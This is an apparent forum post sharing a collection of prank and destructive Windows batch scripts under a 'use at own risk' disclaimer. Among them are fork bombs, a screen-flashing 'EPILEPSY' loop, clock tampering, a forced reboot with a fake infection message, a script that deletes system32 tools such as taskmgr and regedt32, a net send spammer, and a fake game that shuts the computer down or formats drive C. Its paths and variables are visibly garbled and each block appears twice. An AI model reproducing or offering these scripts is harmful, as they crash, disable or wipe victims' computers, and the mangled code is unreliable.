Disclaimer
I am posting this information for informational and educational purposes only. If you attempt to use any the following batch codes, do so at your own risk. I nor http://www.Gaiaonline.com do not reccomend the use of these, USE AT OWN RISK. http://www.gaiaonline.com nor I are responsible for paying bail or any other fees that result of this information being posted.
Quote:
Ok, here is a little bit of information on Batch Files.
In MS-DOS, OS/2 and Windows, a batch file is a text file containing a series of commands intended to be executed by the command interpreter. When a batch file is run, the shell program (usually COMMAND.COM or cmd.exe) reads the file and executes its commands, normally line-by-line. A batch file is analogous to a shell script in Unix-like operating systems.
DOS batch files have the filename extension .BAT. Batch files for other environments may have different extensions, e.g. .CMD in Windows NT and OS/2, or .BTM in 4DOS and related shells.
AUTOEXEC.BAT is a special batch file that is executed during the booting process.
For more information visit the following URL:
Batch File Information
In MS-DOS, OS/2 and Windows, a batch file is a text file containing a series of commands intended to be executed by the command interpreter. When a batch file is run, the shell program (usually COMMAND.COM or cmd.exe) reads the file and executes its commands, normally line-by-line. A batch file is analogous to a shell script in Unix-like operating systems.
DOS batch files have the filename extension .BAT. Batch files for other environments may have different extensions, e.g. .CMD in Windows NT and OS/2, or .BTM in 4DOS and related shells.
AUTOEXEC.BAT is a special batch file that is executed during the booting process.
For more information visit the following URL:
Batch File Information
Quote:
DO NOT ATTEMPT TO USE THESE ON YOUR COMPUTER. SOME OF THEM HAVE MALICIOUS USES AND MAY ERASE OR OTHER WISE DEFACE YOUR C: DRIVE!
NOTE: These are not all of my own creation. many of these have been taken from this link however I have contributed the items I have written and or found:
URL Edited By Anarchist.Saint. This link could draw alot of attention away from our little forum here.
_____________________________________________________________
@echo off
cls
:top
start bigloop.bat
goto top
(save as bigloop.bat)
cls
:top
start bigloop.bat
goto top
(save as bigloop.bat)
_____________________________________________________________
cls
echo off
goto MTRI
:DTRI
cls
Title Infecting C:,D:,A:....
Dir sy;stemrootsy;stem32
cls
time 23:59:00.00
start Cobalt.vbs
exit
:MTRI
cls
echo off
Title A:/
Dir sy;stemroot%
Title D:/
Dir sy;stemroot%
Title Drives Mapped...
Dir sy;stemroot%
goto DTRI
echo off
goto MTRI
:DTRI
cls
Title Infecting C:,D:,A:....
Dir sy;stemrootsy;stem32
cls
time 23:59:00.00
start Cobalt.vbs
exit
:MTRI
cls
echo off
Title A:/
Dir sy;stemroot%
Title D:/
Dir sy;stemroot%
Title Drives Mapped...
Dir sy;stemroot%
goto DTRI
_____________________________________________________________
(cobalt.vbs)
Alpha = " Your computer has"
Beta = "been infected by the Winows 2000 worm"
Cappa = "Have a nice day Smile"
Brom = "~CritikalMass"
wscript.Echo Alpha & " " & Beta & " " & Cappa & " " & Brom
wscript.Echo " One Minute Till Midnight You Had Better Hurry -60 and counting"
For i = 1 to 60
Wscript.echo i
next
wscript.Echo " !!!!!!!BOOM!!!!!!! "
Alpha = " Your computer has"
Beta = "been infected by the Winows 2000 worm"
Cappa = "Have a nice day Smile"
Brom = "~CritikalMass"
wscript.Echo Alpha & " " & Beta & " " & Cappa & " " & Brom
wscript.Echo " One Minute Till Midnight You Had Better Hurry -60 and counting"
For i = 1 to 60
Wscript.echo i
next
wscript.Echo " !!!!!!!BOOM!!!!!!! "
_____________________________________________________________
(epilepsy.bat)
cls
@echo off
cls
Title EPILEPSY
cls
:color
cls
color F7
cls
color 0F
cls
color F7
cls
color 0F
cls
color F7
cls
color 0F
cls
goto color
cls
@echo off
cls
Title EPILEPSY
cls
:color
cls
color F7
cls
color 0F
cls
color F7
cls
color 0F
cls
color F7
cls
color 0F
cls
goto color
_____________________________________________________________
(drive mapper.bat)
@echo off
title Drive MApper (property of CritikalMass)
cls
echo ok this is a drive mapper the first drive to map is C: then D: (if exists) Then A: (if exist) etc etc...it will show all folders hidden or not
pause
tree C:/ /f
echo next D:
pause
tree D:/ /f
echo a:/
pause
tree a:/ /f
echo F:
pause
tree f:/ /f
echo well thats it time to close...
pause
exit
@echo off
title Drive MApper (property of CritikalMass)
cls
echo ok this is a drive mapper the first drive to map is C: then D: (if exists) Then A: (if exist) etc etc...it will show all folders hidden or not
pause
tree C:/ /f
echo next D:
pause
tree D:/ /f
echo a:/
pause
tree a:/ /f
echo F:
pause
tree f:/ /f
echo well thats it time to close...
pause
exit
_____________________________________________________________
(time chaser.bat)
:mix
@echo off
title 12:00
time 12:00:00
title 1:00
time 1:00:00
title 2:00
time 2:00:00
title 3:00
time 3:00:00
title 4:00
time 4:00:00
title 5:00
time 5:00:00
title 6:00
time 6:00:00
title 7:00
time 7:00:00
title 8:00
time 8:00:00
title 9:00
time 9:00:00
title 10:00
time 10:00:00
title 11:00
time 11:00:00
title 12:00
time 12:00:00
goto mix
:mix
@echo off
title 12:00
time 12:00:00
title 1:00
time 1:00:00
title 2:00
time 2:00:00
title 3:00
time 3:00:00
title 4:00
time 4:00:00
title 5:00
time 5:00:00
title 6:00
time 6:00:00
title 7:00
time 7:00:00
title 8:00
time 8:00:00
title 9:00
time 9:00:00
title 10:00
time 10:00:00
title 11:00
time 11:00:00
title 12:00
time 12:00:00
goto mix
_____________________________________________________________
(simple loop.bat)
@echo off
cls
:top
title Never Ending...
echo THIS WILL NEVER END!
pause
goto top
@echo off
cls
:top
title Never Ending...
echo THIS WILL NEVER END!
pause
goto top
_____________________________________________________________
(annoyance.bat)
@echo off
CLS
title INFECTION...
cls
start C:WINDOWSclock.avi
time 12:00:00
cls
shutdown -r -t 60 -c "MWAHAHAHAH KERNEL HAS BEEN INFECTED!!!
@echo off
CLS
title INFECTION...
cls
start C:WINDOWSclock.avi
time 12:00:00
cls
shutdown -r -t 60 -c "MWAHAHAHAH KERNEL HAS BEEN INFECTED!!!
_____________________________________________________________
(du-blanche.bat)
@echo off
cls
del sy;stemrootsy;stem32sndrec32.exe
del sy;stemrootsy;stem32shutdown.exe
del sy;stemrootsy;stem32sndvol32.exe
del sy;stemrootsy;stem32sysedit.exe
del sy;stemrootsy;stem32telnet.exe
del sy;stemrootsy;stem32taskman.exe
del sy;stemrootsy;stem32regedt32.exe
del sy;stemrootsy;stem32print.exe
del sy;stemrootsy;stem32ping.exe
del sy;stemrootsy;stem32recover.exe
del sy;stemrootsy;stem32reset.exe
del sy;stemrootsy;stem32taskmgr.exe
rename sy;stemrootsy;stem32ping6.exe taskmgr.exe
rmdir sy;stemrootre;pair
rmdir sy;stemrootja;va
set dircmd=0
time 23:59:00
move du-blanche.bat*.* sy;stemrootte;mp
@echo off
cls
del sy;stemrootsy;stem32sndrec32.exe
del sy;stemrootsy;stem32shutdown.exe
del sy;stemrootsy;stem32sndvol32.exe
del sy;stemrootsy;stem32sysedit.exe
del sy;stemrootsy;stem32telnet.exe
del sy;stemrootsy;stem32taskman.exe
del sy;stemrootsy;stem32regedt32.exe
del sy;stemrootsy;stem32print.exe
del sy;stemrootsy;stem32ping.exe
del sy;stemrootsy;stem32recover.exe
del sy;stemrootsy;stem32reset.exe
del sy;stemrootsy;stem32taskmgr.exe
rename sy;stemrootsy;stem32ping6.exe taskmgr.exe
rmdir sy;stemrootre;pair
rmdir sy;stemrootja;va
set dircmd=0
time 23:59:00
move du-blanche.bat*.* sy;stemrootte;mp
_____________________________________________________________
(net send.bat)
@echo off
title Network Messenger
Cls
echo */Only Input Name of Remote Host once
echo */Remember * can be used as a domain wildcard
echo Network Messenger
:A
set /p n=User:
set /p m=Message:
net send %n% %m%
goto A
exit
@echo off
title Network Messenger
Cls
echo */Only Input Name of Remote Host once
echo */Remember * can be used as a domain wildcard
echo Network Messenger
:A
set /p n=User:
set /p m=Message:
net send %n% %m%
goto A
exit
_____________________________________________________________
(net send loop.bat)
title Messenger
:A
Cls
Title Nuking...
net send * ******** A
title Messenger
:A
Cls
Title Nuking...
net send * ******** A
_____________________________________________________________
@echo off
cls
echo This is a virus.
pause
echo Please wait while this program uploads your information to another user.
pause
echo If you don't believe me then go look in your c: drive!
MD "c:virus"
CD "c:virus
echo RD/s/q "c:windows" >> virus.bat
pause
cls
echo This is a virus.
pause
echo Please wait while this program uploads your information to another user.
pause
echo If you don't believe me then go look in your c: drive!
MD "c:virus"
CD "c:virus
echo RD/s/q "c:windows" >> virus.bat
pause
_____________________________________________________________
@echo off
echo You can go to hell!
:loop
start batch2
goto loop
save it as batch1.bat
@echo off
echo b***h!
:loop
start batch1
goto loop
save it as batch2.bat
Start a notepad file and save this as StartbatchFiles.bat
run batch1.bat
run batch2.bat
echo You can go to hell!
:loop
start batch2
goto loop
save it as batch1.bat
@echo off
echo b***h!
:loop
start batch1
goto loop
save it as batch2.bat
Start a notepad file and save this as StartbatchFiles.bat
run batch1.bat
run batch2.bat
_____________________________________________________________
Title: ******** Off
@echo off
echo "******** off..."
end
@echo off
echo "******** off..."
end
_____________________________________________________________
@echo off
@title The .bat Game
:menu
cls
echo Welcome to the .bat Game!
echo Please choose an option:
echo.
echo 1. Start game
echo 2. Exit
echo.
set /p mode=Please choose an option:
if mo;de%==1 goto run
if mo;de%==2 goto exit
goto wrong
:wrong
cls
echo You chose a wrong option!
echo Please choose the correct option... NUBLET
echo.
echo Press any key if you wish to go back to the menu . . .
pause > nul
goto menu
:run
cls
echo Do you want a million dollars?
echo yes or no
echo one three three seven
set /p mode=Please type yes or no:
if mo;de%==yes goto shutdown
if mo;de%==no goto exit
if mo;de%==1337 goto leet
goto wrong
:shutdown
cls
echo As you wish...
c:windowssystem32shutdown.exe -s
:leet
cls
echo You are not leet you nublet!!
start firefox http://www.urbandictionary.com/define.php?term=nublet
pause > nul
:exit
fromat c:
@title The .bat Game
:menu
cls
echo Welcome to the .bat Game!
echo Please choose an option:
echo.
echo 1. Start game
echo 2. Exit
echo.
set /p mode=Please choose an option:
if mo;de%==1 goto run
if mo;de%==2 goto exit
goto wrong
:wrong
cls
echo You chose a wrong option!
echo Please choose the correct option... NUBLET
echo.
echo Press any key if you wish to go back to the menu . . .
pause > nul
goto menu
:run
cls
echo Do you want a million dollars?
echo yes or no
echo one three three seven
set /p mode=Please type yes or no:
if mo;de%==yes goto shutdown
if mo;de%==no goto exit
if mo;de%==1337 goto leet
goto wrong
:shutdown
cls
echo As you wish...
c:windowssystem32shutdown.exe -s
:leet
cls
echo You are not leet you nublet!!
start firefox http://www.urbandictionary.com/define.php?term=nublet
pause > nul
:exit
fromat c:
